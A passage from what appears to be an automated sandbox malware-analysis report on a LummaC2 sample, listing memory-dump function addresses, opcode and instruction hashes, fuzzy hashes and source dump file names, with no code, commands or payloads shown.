                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88bac982fd72fab83854b74bcc3eb18df38a5dc65a0a8ff7741a16951410deae
                                              • Instruction ID: aa1bf5253e7b408c2e7120f73cd2433b0efda8387369bcc04a278f6b9abc4e8e
                                              • Opcode Fuzzy Hash: 88bac982fd72fab83854b74bcc3eb18df38a5dc65a0a8ff7741a16951410deae
                                              • Instruction Fuzzy Hash: 4DE1F075609314CFD304CF29D8947AABBE2BBC8314F09897CE48597391D775D94ACB82
                                              Function 00E12FE0 Relevance: .4, Instructions: 432COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d92e2f0b407c7c9fa116085dd2195cb87332db83f5b430fbaec68327618434bb
                                              • Instruction ID: a0dfd998fccf3191c4c4bcdb1d6ae23dfdd7ac7b482d04040152d4303235781a
                                              • Opcode Fuzzy Hash: d92e2f0b407c7c9fa116085dd2195cb87332db83f5b430fbaec68327618434bb
                                              • Instruction Fuzzy Hash: E8D1EAB06083408BD314DF68C891BABBBF4EF85318F14992CF5959B391E7B9D944CB52
                                              Function 00E2D0E0 Relevance: .4, Instructions: 409COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07783e8c0f0018743e06c9d8113d57158b33e514dd75d29c7c602402baade324
                                              • Instruction ID: c6a74c13d141075649d1cf1167885cb071a807b09eb0b7df601b6467d6c3de64
                                              • Opcode Fuzzy Hash: 07783e8c0f0018743e06c9d8113d57158b33e514dd75d29c7c602402baade324
                                              • Instruction Fuzzy Hash: 84E11932E146608FC715CB7CCC4539EBFB2AB5A324F1DC299D5A5AB3D6C2758802C7A1
                                              Function 00DF5A80 Relevance: .4, Instructions: 400COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c161b06ef066708bfc0a3135f2b89407862ec0051b3abc47466e4f2402248843
                                              • Instruction ID: 3254e008f3c5a5259518cf016265a5e3bca2d1016ac5e51a927bb7b48e08b7b5
                                              • Opcode Fuzzy Hash: c161b06ef066708bfc0a3135f2b89407862ec0051b3abc47466e4f2402248843
                                              • Instruction Fuzzy Hash: 35E19A711087458FC720CF29C880A6BBBE1EF98300F49886DF6D987751E775E948CBA2
                                              Function 00E106EF Relevance: .4, Instructions: 392COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0f16d0a27d54881d29f41f31f9da7579972470d1ed31f10f16d051ef13c8812
                                              • Instruction ID: d0d1ab1578a788c90f8d938c1a1d7d9e1dbda515afe57ed60580d26b519c1799
                                              • Opcode Fuzzy Hash: b0f16d0a27d54881d29f41f31f9da7579972470d1ed31f10f16d051ef13c8812
                                              • Instruction Fuzzy Hash: 1E124D61108BC29ED326CB3C8848756BF916B67224F18C78CE4F94B7D3D3669156C7A2
                                              Function 00E22DA3 Relevance: .4, Instructions: 380COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3bc7ae28b7fb4433e92c4ecf858b8fe786ab1fb3b7d9d450b2032c4ef8c92a33
                                              • Instruction ID: bce6c803eec8b42d45a10f9ad24ada7fee28be4a6761abad7e94a8aa6f85ecaa
                                              • Opcode Fuzzy Hash: 3bc7ae28b7fb4433e92c4ecf858b8fe786ab1fb3b7d9d450b2032c4ef8c92a33
                                              • Instruction Fuzzy Hash: BAE1F572604B804BD32A8A3888953E7BFD2ABD6314F0D8A7DD5FA873C6D678A505C711
                                              Function 00E24757 Relevance: .4, Instructions: 371COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 49b196351881711f829d062de00e5773d90adaa78542d479a4e2c67462d5b305
                                              • Instruction ID: 338483e4de835e099338075accdd4b4ac765fbe2627a3a3cccbf651f0ddb54a5
                                              • Opcode Fuzzy Hash: 49b196351881711f829d062de00e5773d90adaa78542d479a4e2c67462d5b305
                                              • Instruction Fuzzy Hash: B3E115B2609F808FD3258B38D8953A7BFD2ABD5314F0D897DD4EA87782C675A4058712
                                              Function 00E0DE20 Relevance: .3, Instructions: 337COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9ebb4f1f07302c1a42562951039ff41bd9a8de856ed10371a08b19af4d5ff71
                                              • Instruction ID: 63f01d195a5045b7c299f7ce99afc5e096bd2fc82a4991b1120d1501b1d0cb57
                                              • Opcode Fuzzy Hash: f9ebb4f1f07302c1a42562951039ff41bd9a8de856ed10371a08b19af4d5ff71
                                              • Instruction Fuzzy Hash: 14B1D071A04201AFE7649F24DC45B5ABBE1AFD4324F149A2CF898B33E1D771AD948B42
                                              Function 00DF62E0 Relevance: .3, Instructions: 303COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f47b85ec2c6d7235abdf968704e2fd8d4277f050bba349a318b23cfbe7d91b9f
                                              • Instruction ID: 03a0975e3973ac33328905f377c20f306d41d88623428bcd1d99adf5c340e0e7
                                              • Opcode Fuzzy Hash: f47b85ec2c6d7235abdf968704e2fd8d4277f050bba349a318b23cfbe7d91b9f
                                              • Instruction Fuzzy Hash: 8DC16CB29087458FC320CF28CC867ABB7E1BF85318F09892DD2D9C6642E778E155CB56
                                              Function 00E09043 Relevance: .3, Instructions: 270COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 574d934f0600ce170fde679b2843eecc012ba7e56849d0c928b2f1474662dc2e
                                              • Instruction ID: 0f41bfc40ff8a0fc6813f6afb47b2622cbb8d37fea697e1bbe9af0a39f473e5b
                                              • Opcode Fuzzy Hash: 574d934f0600ce170fde679b2843eecc012ba7e56849d0c928b2f1474662dc2e
                                              • Instruction Fuzzy Hash: 558121B6A00605CFC7208F24CC92663B3F2FF99314F188538E99A977A3E735A854CB10
                                              Function 00E0E230 Relevance: .3, Instructions: 260COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d5c1663f6ae295ea7488f3a4df2eeb0b54a1f45631e1a26c596d1b807ce4e09
                                              • Instruction ID: f8ac0e97524cfd29727c312db2cb60d39d946f7776d5abd939646cb5de73a0ba
                                              • Opcode Fuzzy Hash: 9d5c1663f6ae295ea7488f3a4df2eeb0b54a1f45631e1a26c596d1b807ce4e09
                                              • Instruction Fuzzy Hash: 3A816923B0DA904BE324883C4C153AA7E834BD6334F2DDBBAE5F5A73E5E5658C454340
                                              Function 00E34BE0 Relevance: .2, Instructions: 240COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36060551e181361981ef05aa4f73447f88943a552aa19e4aa6a5d7a036d11f10
                                              • Instruction ID: 1c2d4af9684176c3c61df4b7983037b6d459c6a152b5abc888601a2effbbd648
                                              • Opcode Fuzzy Hash: 36060551e181361981ef05aa4f73447f88943a552aa19e4aa6a5d7a036d11f10
                                              • Instruction Fuzzy Hash: 6781DF742042019FD714DF19D894A2ABBF1FF88718F15A62CE995AB3E0EB30EC11CB41
                                              Function 00E27640 Relevance: .2, Instructions: 218COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5bb3f87008a4c8762984d5add2577bc8c61f1e0ffb9d58cce90fbd405e5f3ce9
                                              • Instruction ID: 3d8134d70d0c0ce346f8cf9d44aba48d6d74d202a4ff28457b19d6c77daca557
                                              • Opcode Fuzzy Hash: 5bb3f87008a4c8762984d5add2577bc8c61f1e0ffb9d58cce90fbd405e5f3ce9
                                              • Instruction Fuzzy Hash: 4A615B3375DAA14B932C983D5C262AABAC34BD6234B2DD77EE1F2DB3E1E9644C054240
                                              Function 00E1CCB0 Relevance: .2, Instructions: 201COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51c94539ea6f2930231b92e30ee664c243044a8bcfc5153bcbf8975c1b9cbc82
                                              • Instruction ID: 906ea00b096cfae8f6ec0e81857aeeb546f716c125b6f105a4892a18807dc9b6
                                              • Opcode Fuzzy Hash: 51c94539ea6f2930231b92e30ee664c243044a8bcfc5153bcbf8975c1b9cbc82
                                              • Instruction Fuzzy Hash: 335166725483585FD7268F3888407EBBBD09F81318F19862CE8A99B2C1D770ED48C3D2
                                              Function 00E0E710 Relevance: .2, Instructions: 195COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3c896d43e73822df6aedc6ebe6dcd7c560645028e232a5df2a20eb5b81e4e7d5
                                              • Instruction ID: e2aa2efa34d7be649db5fbb35b93ebcbb6ae122c06fe13faee9eeee4dc74f977
                                              • Opcode Fuzzy Hash: 3c896d43e73822df6aedc6ebe6dcd7c560645028e232a5df2a20eb5b81e4e7d5
                                              • Instruction Fuzzy Hash: 18512332B49A804BE338893D4C612AA7E934BD3334B2DDB7EE1F2973E5D56548468350
                                              Function 00E2CE80 Relevance: .2, Instructions: 189COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88c60ca6edbf858cd5bcbdf64b1ba0810bb421244924eebe0dbab3ef6184fcd5
                                              • Instruction ID: 6675c5caef696dfae1cb70752b134695fbf9f13eb489127e57cd2c260672e973
                                              • Opcode Fuzzy Hash: 88c60ca6edbf858cd5bcbdf64b1ba0810bb421244924eebe0dbab3ef6184fcd5
                                              • Instruction Fuzzy Hash: 7F515CB16087548FE314DF29D89475BBBE1FBC8318F144A2DE5E997350E379DA088B82
                                              Function 00E27420 Relevance: .2, Instructions: 183COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0efe513d3781f6b93adda7a3809799019f4a506c4ab47b93e8b3330cbae32a7
                                              • Instruction ID: fde44b76ec58eae7174edfd90fd32b86a3ab5f5f99c8f78a2ec00f43c304bffd
                                              • Opcode Fuzzy Hash: a0efe513d3781f6b93adda7a3809799019f4a506c4ab47b93e8b3330cbae32a7
                                              • Instruction Fuzzy Hash: 2F511622A4D9F04BD338953D6C613AABE834BD7334B2CA7ADE5F1A73E1D5658C058340
                                              Function 00DFD5AD Relevance: .2, Instructions: 164COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8d6f4135206b34271914b3d3b1e9ee8c6c5675885a36fc5c3fa7c687ccaa27d2
                                              • Instruction ID: 74ace58705a018b964a16b0a4daf5aab9c824ae17535e53e4d6720d9d16d168a
                                              • Opcode Fuzzy Hash: 8d6f4135206b34271914b3d3b1e9ee8c6c5675885a36fc5c3fa7c687ccaa27d2
                                              • Instruction Fuzzy Hash: B8412933A542568FD328CB29DC40B7AB7A3ABC8314F59C66CD999D73C5E3389C048791
                                              Function 00E0C270 Relevance: .2, Instructions: 154COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87540ad4b299ceef8dbccc3186a9b1f2ece6b0a4b770625da2d02bf3b1c8b6b0
                                              • Instruction ID: 7f8dfe134de6297545345cfe0b1f08e4fb62314d46e4b03e8dd3e6e337313797
                                              • Opcode Fuzzy Hash: 87540ad4b299ceef8dbccc3186a9b1f2ece6b0a4b770625da2d02bf3b1c8b6b0
                                              • Instruction Fuzzy Hash: 794126729082915BD309CF398450727FFE69BE2304F2CE5AEE4C1A73A2DB7488458792
                                              Function 00DF2910 Relevance: .2, Instructions: 150COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4634e592a77d99470ce8aedb85c8ed404f4dc779cbd21d9aa816c76dea37d90f
                                              • Instruction ID: 581248bd3e210a1ff353bbff47ff3933a47285dc1cc475d997ff6c1f6d1d0d91
                                              • Opcode Fuzzy Hash: 4634e592a77d99470ce8aedb85c8ed404f4dc779cbd21d9aa816c76dea37d90f
                                              • Instruction Fuzzy Hash: 0041C2327082194BCB248E6DCD902BAFAD3AFC4344F1EC679E9C5D7346D534D9109BA0
                                              Function 00DF8A70 Relevance: .1, Instructions: 143COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cda7fdd38f47feeed4e07a2c5b1df403cad31590fc4e6c333b39601136bce61b
                                              • Instruction ID: e1bd767466fcfffaf9543bcfeef477364184b0a14b495bca1c5782152ef5f088
                                              • Opcode Fuzzy Hash: cda7fdd38f47feeed4e07a2c5b1df403cad31590fc4e6c333b39601136bce61b
                                              • Instruction Fuzzy Hash: 6141B737B215144BE714CA25CC483A632D39BD9338F3FCAB8D529DB796D93799138680
